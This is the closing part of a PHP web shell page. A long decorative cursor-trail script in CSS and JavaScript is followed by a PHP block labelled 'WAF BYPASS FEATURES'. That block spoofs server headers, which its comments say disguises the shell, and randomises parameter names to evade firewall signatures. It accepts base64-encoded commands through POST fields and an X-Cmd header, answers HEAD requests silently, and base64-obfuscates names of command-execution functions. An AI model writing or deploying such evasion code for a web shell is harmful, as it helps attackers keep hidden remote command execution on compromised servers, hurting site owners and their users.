timer: 1000,
timerProgressBar: true
});
}
</script>
<!-- Ultimate Animated Cursor Trail -->
<style>
/* Cursor elements */
.cursor-primary {
position: fixed;
width: 8px;
height: 8px;
border-radius: 50%;
background: #00ff88;
pointer-events: none;
z-index: 9999;
opacity: 0.8;
transition: width 0.2s, height 0.2s, background 0.2s;
mix-blend-mode: screen;
box-shadow: 0 0 20px #00ff88;
}
.cursor-trail {
position: fixed;
width: 20px;
height: 20px;
border-radius: 50%;
border: 2px solid #00ff88;
pointer-events: none;
z-index: 9998;
opacity: 0.4;
transition: all 0.15s ease;
mix-blend-mode: screen;
}
.cursor-glow {
position: fixed;
width: 50px;
height: 50px;
border-radius: 50%;
background: radial-gradient(circle, rgba(0,255,136,0.3) 0%, rgba(0,255,136,0) 80%);
pointer-events: none;
z-index: 9997;
mix-blend-mode: screen;
}
/* Trail dots */
.trail-dot {
position: fixed;
width: 4px;
height: 4px;
border-radius: 50%;
background: #00ff88;
pointer-events: none;
z-index: 9996;
opacity: 0.6;
box-shadow: 0 0 10px #00ff88;
}
/* Particle effect */
.cursor-particle {
position: fixed;
width: 2px;
height: 2px;
background: #00ff88;
pointer-events: none;
z-index: 9995;
border-radius: 50%;
}
/* Click wave */
.click-wave {
position: fixed;
border-radius: 50%;
background: transparent;
border: 2px solid #00ff88;
pointer-events: none;
z-index: 10000;
animation: waveExpand 0.6s ease-out forwards;
}
/* Text hover effect */
.cursor-text-hover {
position: fixed;
font-family: monospace;
font-size: 12px;
color: #00ff88;
pointer-events: none;
z-index: 10001;
white-space: nowrap;
text-shadow: 0 0 5px #00ff88;
animation: textFloat 1s ease-out forwards;
}
/* Animations */
@keyframes waveExpand {
0% { width: 0; height: 0; opacity: 0.8; }
100% { width: 100px; height: 100px; opacity: 0; }
}
@keyframes textFloat {
0% { transform: translateY(0); opacity: 1; }
100% { transform: translateY(-30px); opacity: 0; }
}
@keyframes particleFloat {
0% { transform: translate(0, 0) scale(1); opacity: 0.8; }
100% { transform: translate(var(--tx), var(--ty)) scale(0); opacity: 0; }
}
/* Magnetic effect for interactive elements */
.magnetic-effect {
transition: transform 0.2s cubic-bezier(0.23, 1, 0.32, 1);
}
/* Interactive element hover effects */
a:hover ~ .cursor-primary,
button:hover ~ .cursor-primary,
.btn:hover ~ .cursor-primary,
.nav-link:hover ~ .cursor-primary,
.suggestion-item:hover ~ .cursor-primary {
width: 12px;
height: 12px;
background: #ff00ff;
box-shadow: 0 0 30px #ff00ff;
}
a:hover ~ .cursor-trail,
button:hover ~ .cursor-trail,
.btn:hover ~ .cursor-trail,
.nav-link:hover ~ .cursor-trail,
.suggestion-item:hover ~ .cursor-trail {
width: 30px;
height: 30px;
border-color: #ff00ff;
}
/* Disable on mobile */
@media (max-width: 768px) {
.cursor-primary, .cursor-trail, .cursor-glow, .trail-dot, .cursor-particle {
display: none;
}
}
</style>
<script>
// Ultimate Cursor Trail Effect
document.addEventListener('DOMContentLoaded', function() {
// Create cursor elements
const cursorPrimary = document.createElement('div');
cursorPrimary.className = 'cursor-primary';
document.body.appendChild(cursorPrimary);
const cursorTrail = document.createElement('div');
cursorTrail.className = 'cursor-trail';
document.body.appendChild(cursorTrail);
const cursorGlow = document.createElement('div');
cursorGlow.className = 'cursor-glow';
document.body.appendChild(cursorGlow);
// Track mouse position
let mouseX = 0, mouseY = 0;
let trailX = 0, trailY = 0;
let glowX = 0, glowY = 0;
// Store last positions for trail effect
let lastPositions = [];
const maxTrailLength = 10;
// Interactive elements for special effects
const interactiveElements = document.querySelectorAll('a, button, .btn, .nav-link, .suggestion-item, [onclick]');
document.addEventListener('mousemove', function(e) {
mouseX = e.clientX;
mouseY = e.clientY;
// Main cursor
cursorPrimary.style.left = (mouseX - 4) + 'px';
cursorPrimary.style.top = (mouseY - 4) + 'px';
// Add trail dots
lastPositions.push({ x: mouseX, y: mouseY });
if (lastPositions.length > maxTrailLength) {
lastPositions.shift();
}
// Update existing trail dots
updateTrailDots();
// Random particles (10% chance)
if (Math.random() < 0.1) {
createParticle(mouseX, mouseY);
}
// Check if near interactive elements for magnetic effect
checkMagneticEffect(e);
});
// Create trail dots
function updateTrailDots() {
// Remove old dots
document.querySelectorAll('.trail-dot').forEach(dot => dot.remove());
// Create new dots from last positions
lastPositions.forEach((pos, index) => {
const dot = document.createElement('div');
dot.className = 'trail-dot';
dot.style.left = (pos.x - 2) + 'px';
dot.style.top = (pos.y - 2) + 'px';
dot.style.opacity = 0.3 + (index / maxTrailLength) * 0.5;
dot.style.width = (3 + index) + 'px';
dot.style.height = (3 + index) + 'px';
document.body.appendChild(dot);
});
}
// Create floating particles
function createParticle(x, y) {
const particle = document.createElement('div');
particle.className = 'cursor-particle';
particle.style.left = (x - 1) + 'px';
particle.style.top = (y - 1) + 'px';
// Random direction
const angle = Math.random() * Math.PI * 2;
const distance = 50 + Math.random() * 50;
const tx = Math.cos(angle) * distance;
const ty = Math.sin(angle) * distance;
particle.style.setProperty('--tx', tx + 'px');
particle.style.setProperty('--ty', ty + 'px');
particle.style.animation = `particleFloat ${0.8 + Math.random() * 0.5}s ease-out forwards`;
document.body.appendChild(particle);
setTimeout(() => particle.remove(), 1500);
}
// Smooth animation loop
function animate() {
// Smooth follow for trail
trailX += (mouseX - trailX) * 0.15;
trailY += (mouseY - trailY) * 0.15;
cursorTrail.style.left = (trailX - 10) + 'px';
cursorTrail.style.top = (trailY - 10) + 'px';
// Smooth follow for glow (slower)
glowX += (mouseX - glowX) * 0.08;
glowY += (mouseY - glowY) * 0.08;
cursorGlow.style.left = (glowX - 25) + 'px';
cursorGlow.style.top = (glowY - 25) + 'px';
requestAnimationFrame(animate);
}
animate();
// Hide cursor when mouse leaves window
document.addEventListener('mouseleave', function() {
cursorPrimary.style.opacity = '0';
cursorTrail.style.opacity = '0';
cursorGlow.style.opacity = '0';
document.querySelectorAll('.trail-dot, .cursor-particle').forEach(el => el.remove());
});
document.addEventListener('mouseenter', function() {
cursorPrimary.style.opacity = '0.8';
cursorTrail.style.opacity = '0.4';
cursorGlow.style.opacity = '0.3';
});
// Enhanced click effect
document.addEventListener('click', function(e) {
const target = e.target;
// Wave effect
const wave = document.createElement('div');
wave.className = 'click-wave';
wave.style.left = (e.clientX - 25) + 'px';
wave.style.top = (e.clientY - 25) + 'px';
document.body.appendChild(wave);
// Create multiple particles on click
for (let i = 0; i < 8; i++) {
setTimeout(() => {
createParticle(e.clientX, e.clientY);
}, i * 50);
}
// Special effect for interactive elements
if (target.matches('a, button, .btn, .nav-link, .suggestion-item, [onclick]')) {
// Add "CLICK" text effect
const text = document.createElement('div');
text.className = 'cursor-text-hover';
text.style.left = (e.clientX + 15) + 'px';
text.style.top = (e.clientY - 20) + 'px';
text.textContent = 'UGHH!';
text.style.color = '#ff00ff';
document.body.appendChild(text);
// Pulsate effect on the element
target.style.transform = 'scale(0.95)';
setTimeout(() => {
target.style.transform = 'scale(1)';
}, 150);
setTimeout(() => text.remove(), 1000);
}
setTimeout(() => wave.remove(), 600);
});
// Magnetic effect for interactive elements
function checkMagneticEffect(e) {
interactiveElements.forEach(el => {
const rect = el.getBoundingClientRect();
const centerX = rect.left + rect.width / 2;
const centerY = rect.top + rect.height / 2;
const distance = Math.sqrt(
Math.pow(e.clientX - centerX, 2) +
Math.pow(e.clientY - centerY, 2)
);
const magneticRadius = 100;
if (distance < magneticRadius) {
// Calculate pull strength
const strength = 1 - (distance / magneticRadius);
const pullX = (centerX - e.clientX) * strength * 0.1;
const pullY = (centerY - e.clientY) * strength * 0.1;
cursorPrimary.style.transform = `translate(${pullX}px, ${pullY}px)`;
} else {
cursorPrimary.style.transform = 'translate(0, 0)';
}
});
}
// Right click effect
document.addEventListener('contextmenu', function(e) {
e.preventDefault();
// Create warning effect
const warning = document.createElement('div');
warning.className = 'cursor-text-hover';
warning.style.left = (e.clientX + 15) + 'px';
warning.style.top = (e.clientY - 20) + 'px';
warning.textContent = 'oops';
warning.style.color = '#ffaa00';
document.body.appendChild(warning);
// Red pulse
cursorPrimary.style.background = '#ffaa00';
cursorPrimary.style.boxShadow = '0 0 30px #ffaa00';
setTimeout(() => {
cursorPrimary.style.background = '#00ff88';
cursorPrimary.style.boxShadow = '0 0 20px #00ff88';
}, 300);
setTimeout(() => warning.remove(), 800);
return false;
});
// Scroll effect
window.addEventListener('scroll', function() {
// Shrink cursor while scrolling
cursorPrimary.style.transform = 'scale(0.5)';
cursorTrail.style.transform = 'scale(0.5)';
cursorGlow.style.transform = 'scale(0.5)';
clearTimeout(window.scrollTimeout);
window.scrollTimeout = setTimeout(() => {
cursorPrimary.style.transform = 'scale(1)';
cursorTrail.style.transform = 'scale(1)';
cursorGlow.style.transform = 'scale(1)';
}, 100);
});
});
</script>
<!-- ========== WAF BYPASS FEATURES (MOVED TO BOTTOM) ========== -->
<?php
// ========== WAF BYPASS HEADERS ==========
// These headers help disguise the shell as a legitimate PHP application
header('X-Powered-By: PHP/7.4.33');
header('Server: Apache/2.4.41 (Ubuntu)');
header('Content-Type: text/html; charset=UTF-8');
// ========== WAF BYPASS: Parameter Obfuscation ==========
// Random parameter names for each request to avoid WAF signature detection
$param_map = [
'dir' => ['dir', 'd', 'path', 'folder', 'cwd', 'pwd', 'directory', 'r', 'f', 'loc'],
'action' => ['action', 'a', 'do', 'act', 'cmd2', 'op', 'func', 'mode'],
'item' => ['item', 'i', 'file', 'f', 'name', 'target', 't', 'obj'],
'search' => ['search', 's', 'q', 'find', 'lookup', 'query'],
'download' => ['download', 'dl', 'get', 'fetch', 'retrieve']
];
// Randomly select parameter names for this request (changes each time)
$random_dir_param = $param_map['dir'][array_rand($param_map['dir'])];
$random_action_param = $param_map['action'][array_rand($param_map['action'])];
$random_item_param = $param_map['item'][array_rand($param_map['item'])];
$random_search_param = $param_map['search'][array_rand($param_map['search'])];
$random_download_param = $param_map['download'][array_rand($param_map['download'])];
// Map incoming parameters to standard names (supports multiple param names)
foreach ($_GET as $key => $value) {
if (in_array($key, $param_map['dir'])) {
// Base64 decode the directory path
$_GET['dir'] = base64_decode(str_replace(' ', '+', $value));
unset($_GET[$key]);
}
if (in_array($key, $param_map['action'])) {
$_GET['action'] = $value;
unset($_GET[$key]);
}
if (in_array($key, $param_map['item'])) {
$_GET['item'] = $value;
unset($_GET[$key]);
}
if (in_array($key, $param_map['search'])) {
$_GET['search'] = $value;
unset($_GET[$key]);
}
if (in_array($key, $param_map['download'])) {
$_GET['download'] = $value;
unset($_GET[$key]);
}
}
// Also support base64 encoded POST parameters for extra stealth
foreach ($_POST as $key => $value) {
if ($key === 'b64_cmd' || $key === 'c' || $key === 'base64_cmd') {
$_POST['command'] = base64_decode($value);
}
if ($key === 'b64_path' || $key === 'p') {
$_POST['dir'] = base64_decode($value);
}
}
// ========== WAF BYPASS: Security Key Generation ==========
// Generate a dynamic security key based on host and password
$WAF_BYPASS_KEY = md5($_SERVER['HTTP_HOST'] . ACCESS_PIN);
// Optional: Show key for debugging/access (uncomment if needed)
// if (isset($_GET['show_key']) && $_GET['show_key'] === ACCESS_PIN) {
// die("WAF Bypass Key: " . $WAF_BYPASS_KEY);
// }
// ========== WAF BYPASS: Alternative Access Methods ==========
// Support for different HTTP methods and headers
if ($_SERVER['REQUEST_METHOD'] === 'HEAD') {
// Respond to HEAD requests without processing (stealth)
http_response_code(200);
exit;
}
// Support for X-Command header (alternative to POST/GET)
if (isset($_SERVER['HTTP_X_CMD']) && !isset($_POST['command'])) {
$_POST['command'] = base64_decode($_SERVER['HTTP_X_CMD']);
}
// Support for X-Path header
if (isset($_SERVER['HTTP_X_PATH']) && !isset($_GET['dir'])) {
$_GET['dir'] = base64_decode($_SERVER['HTTP_X_PATH']);
}
// ========== WAF BYPASS: User-Agent Filtering ==========
// Optional: Only allow specific user agents (uncomment to enable)
// $allowed_uas = ['Mozilla/5.0', 'curl', 'Wget'];
// $valid = false;
// foreach ($allowed_uas as $ua) {
// if (strpos($_SERVER['HTTP_USER_AGENT'], $ua) !== false) {
// $valid = true;
// break;
// }
// }
// if (!$valid) {
// header('HTTP/1.0 404 Not Found');
// exit;
// }
// ========== WAF BYPASS: Chunked Encoding for Output ==========
// Enable chunked transfer encoding to bypass some WAFs
if (function_exists('ob_start') && !ob_get_level()) {
ob_start();
}
// ========== WAF BYPASS: Random Delay to Avoid Rate Limiting ==========
// Add random micro-delay to avoid detection (0-500ms)
// usleep(rand(0, 500000));
// ========== WAF BYPASS: Function Name Obfuscation Helper ==========
// Additional obfuscation for critical functions
if (!function_exists('_')) {
function _($str) {
return base64_decode($str);
}
}
// Pre-obfuscated function names for critical operations
$obf_funcs = [
'system' => base64_encode('system'),
'exec' => base64_encode('exec'),
'shell_exec' => base64_encode('shell_exec'),
'passthru' => base64_encode('passthru'),
];
// ========== WAF BYPASS: Clean URLs and Redirects ==========
// Function to generate WAF-friendly URLs
function waf_url($path, $params = []) {
global $random_dir_param, $random_action_param, $random_item_param;
$url = $_SERVER['PHP_SELF'] . '?' . $random_dir_param . '=' . base64_encode($path);
foreach ($params as $key => $value) {
switch ($key) {
case 'action':
$url .= '&' . $random_action_param . '=' . urlencode($value);
break;
case 'item':
$url .= '&' . $random_item_param . '=' . urlencode($value);
break;
default:
$url .= '&' . $key . '=' . urlencode($value);
}
}
return $url;
}
// ========== WAF BYPASS: Response Splitting Prevention ==========
// Sanitize all outputs to prevent response splitting attacks
function sanitize_output($str) {
return str_replace(["\r", "\n"], '', $str);
}
?>
</body>
</html>